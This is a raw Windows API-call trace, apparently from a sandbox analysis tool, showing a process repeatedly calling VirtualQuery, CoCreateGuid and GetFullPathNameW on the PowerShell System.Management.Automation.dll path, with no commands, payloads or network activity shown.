	[0401.509] VirtualQuery (in: lpAddress=0x26baf0, lpBuffer=0x26c9b0, dwLength=0x30 | out: lpBuffer=0x26c9b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.509] VirtualQuery (in: lpAddress=0x26bb80, lpBuffer=0x26ca40, dwLength=0x30 | out: lpBuffer=0x26ca40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.510] VirtualQuery (in: lpAddress=0x26b7c0, lpBuffer=0x26c680, dwLength=0x30 | out: lpBuffer=0x26c680*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.510] VirtualQuery (in: lpAddress=0x26baf0, lpBuffer=0x26c9b0, dwLength=0x30 | out: lpBuffer=0x26c9b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.510] VirtualQuery (in: lpAddress=0x26bb80, lpBuffer=0x26ca40, dwLength=0x30 | out: lpBuffer=0x26ca40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.510] VirtualQuery (in: lpAddress=0x26baf0, lpBuffer=0x26c9b0, dwLength=0x30 | out: lpBuffer=0x26c9b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.510] VirtualQuery (in: lpAddress=0x26bb80, lpBuffer=0x26ca40, dwLength=0x30 | out: lpBuffer=0x26ca40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.510] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xeeed4dcc, Data2=0x2d4d, Data3=0x4998, Data4=([0]=0xaa, [1]=0x1f, [2]=0x4d, [3]=0x6a, [4]=0x19, [5]=0x94, [6]=0xc5, [7]=0xe))) returned 0x0
	[0401.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.514] VirtualQuery (in: lpAddress=0x26bb90, lpBuffer=0x26ca50, dwLength=0x30 | out: lpBuffer=0x26ca50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.515] VirtualQuery (in: lpAddress=0x26bb90, lpBuffer=0x26ca50, dwLength=0x30 | out: lpBuffer=0x26ca50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.515] VirtualQuery (in: lpAddress=0x26bb90, lpBuffer=0x26ca50, dwLength=0x30 | out: lpBuffer=0x26ca50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.515] VirtualQuery (in: lpAddress=0x26baf0, lpBuffer=0x26c9b0, dwLength=0x30 | out: lpBuffer=0x26c9b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.516] VirtualQuery (in: lpAddress=0x26bb80, lpBuffer=0x26ca40, dwLength=0x30 | out: lpBuffer=0x26ca40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.516] VirtualQuery (in: lpAddress=0x26baf0, lpBuffer=0x26c9b0, dwLength=0x30 | out: lpBuffer=0x26c9b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.516] VirtualQuery (in: lpAddress=0x26bb80, lpBuffer=0x26ca40, dwLength=0x30 | out: lpBuffer=0x26ca40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.517] VirtualQuery (in: lpAddress=0x26bb80, lpBuffer=0x26ca40, dwLength=0x30 | out: lpBuffer=0x26ca40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.517] VirtualQuery (in: lpAddress=0x26baf0, lpBuffer=0x26c9b0, dwLength=0x30 | out: lpBuffer=0x26c9b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.517] VirtualQuery (in: lpAddress=0x26bb80, lpBuffer=0x26ca40, dwLength=0x30 | out: lpBuffer=0x26ca40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.517] VirtualQuery (in: lpAddress=0x26baf0, lpBuffer=0x26c9b0, dwLength=0x30 | out: lpBuffer=0x26c9b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.517] VirtualQuery (in: lpAddress=0x26bb80, lpBuffer=0x26ca40, dwLength=0x30 | out: lpBuffer=0x26ca40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.517] VirtualQuery (in: lpAddress=0x26baf0, lpBuffer=0x26c9b0, dwLength=0x30 | out: lpBuffer=0x26c9b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.518] VirtualQuery (in: lpAddress=0x26bb80, lpBuffer=0x26ca40, dwLength=0x30 | out: lpBuffer=0x26ca40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.518] VirtualQuery (in: lpAddress=0x26b7c0, lpBuffer=0x26c680, dwLength=0x30 | out: lpBuffer=0x26c680*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.518] VirtualQuery (in: lpAddress=0x26baf0, lpBuffer=0x26c9b0, dwLength=0x30 | out: lpBuffer=0x26c9b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.518] VirtualQuery (in: lpAddress=0x26bb80, lpBuffer=0x26ca40, dwLength=0x30 | out: lpBuffer=0x26ca40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.518] VirtualQuery (in: lpAddress=0x26baf0, lpBuffer=0x26c9b0, dwLength=0x30 | out: lpBuffer=0x26c9b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.518] VirtualQuery (in: lpAddress=0x26bb80, lpBuffer=0x26ca40, dwLength=0x30 | out: lpBuffer=0x26ca40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.519] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xe8646ee4, Data2=0x1dd9, Data3=0x4f7a, Data4=([0]=0xbc, [1]=0x7, [2]=0x1a, [3]=0x1c, [4]=0x3e, [5]=0x4, [6]=0x98, [7]=0x2b))) returned 0x0
	[0401.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.520] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x5cac56a9, Data2=0xe35e, Data3=0x4789, Data4=([0]=0x8f, [1]=0x35, [2]=0xa3, [3]=0x89, [4]=0xfc, [5]=0x15, [6]=0x26, [7]=0x8c))) returned 0x0
	[0401.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
